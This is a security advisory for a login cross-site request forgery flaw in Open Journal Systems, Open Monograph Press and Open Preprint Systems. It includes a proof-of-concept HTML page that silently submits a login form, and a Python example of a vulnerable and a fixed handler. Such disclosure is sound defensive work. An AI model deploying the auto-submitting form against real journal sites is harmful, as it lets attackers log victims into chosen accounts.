PKP-WAL <= 3.5.0-1 Login Cross-Site Request Forgery Vulnerability
• Software Links:
https://github.com/pkp/pkp-lib
• Affected Versions:
Version 3.3.0-21 and prior versions.
Version 3.4.0-9 and prior versions.
Version 3.5.0-1 and prior versions.
• Vulnerability Description:
Open Journal Systems (OJS), Open Monograph Press (OMP), and Open Preprint Systems (OPS) allow users to perform a login without providing the “csrfToken” parameter: the token is included in the login form on the client side, but it is not validated on the server side. As such, all these applications are vulnerable to potential “Login Cross-Site Request Forgery” attacks.
• Proof of Concept:
Open an HTML page like the following with a browser, and you will be automatically logged in as the chosen user:
<html>
  <body>
    <form action="http://localhost/ojs-3.5.0-1/index.php/egix_journal/login/signIn" method="post">
      <input type="hidden" name="username" value="tester">
      <input type="hidden" name="password" value="password">
    </form>
    <script>document.forms[0].submit()</script>
  </body>
</html>
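The following is an added illustration of the server-side defect described above and of the corresponding fix; it is example code written for this advisory, not pkp-lib's own implementation. It assumes a server-side session dictionary and a constructed user store; the vulnerable handler never reads “csrfToken”, so the cross-site POST from the proof of concept succeeds, while the hardened handler rejects any request whose token is missing or does not match the session-bound value.

```python
import hmac
import secrets

# Constructed user store for the example (not pkp-lib's data model).
USERS = {"tester": "password"}


def new_session():
    """Server-side session carrying a per-session CSRF token (assumed layout)."""
    return {"user": None, "csrfToken": secrets.token_hex(32)}


def sign_in_vulnerable(session, form):
    """Pattern the advisory describes: the login form ships a csrfToken field,
    but the handler never checks it, so username/password alone are enough."""
    if USERS.get(form.get("username")) == form.get("password"):
        session["user"] = form["username"]
        return True
    return False


def sign_in_fixed(session, form):
    """Hardened variant: the token must be present and must match the one bound
    to the session before the credentials are even looked at."""
    token = form.get("csrfToken")
    expected = session["csrfToken"]
    if not token or not hmac.compare_digest(token.encode(), expected.encode()):
        return False  # cross-site POST (no token) or stale/forged token
    if USERS.get(form.get("username")) == form.get("password"):
        session["user"] = form["username"]
        session["csrfToken"] = secrets.token_hex(32)  # rotate token on login
        return True
    return False


if __name__ == "__main__":
    s = new_session()
    # Constructed cross-site request: same fields as the PoC form, no csrfToken.
    cross_site = {"username": "tester", "password": "password"}
    print("vulnerable handler:", sign_in_vulnerable(dict(s), cross_site))  # True
    print("fixed handler:     ", sign_in_fixed(dict(s), cross_site))       # False
```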
• Solution:
Upgrade to versions 3.3.0-22, 3.4.0-10, 3.5.0-2, or later.
• Disclosure Timeline:
[21/10/2025] – Vendor notified
[24/10/2025] – Vendor fixed the issue and opened a public GitHub issue: https://github.com/pkp/pkp-lib/issues/11978
[12/11/2025] – CVE identifier requested
[20/11/2025] – Version 3.3.0-22 released
[22/11/2025] – Version 3.4.0-10 released
[12/12/2025] – CVE identifier assigned
[29/11/2025] – Version 3.5.0-2 released
[23/12/2025] – Publication of this advisory
• CVE Reference:
The Common Vulnerabilities and Exposures program (cve.org) has assigned the name CVE-2025-67892 to this vulnerability.
• Credits:
Vulnerability discovered by Egidio Romano.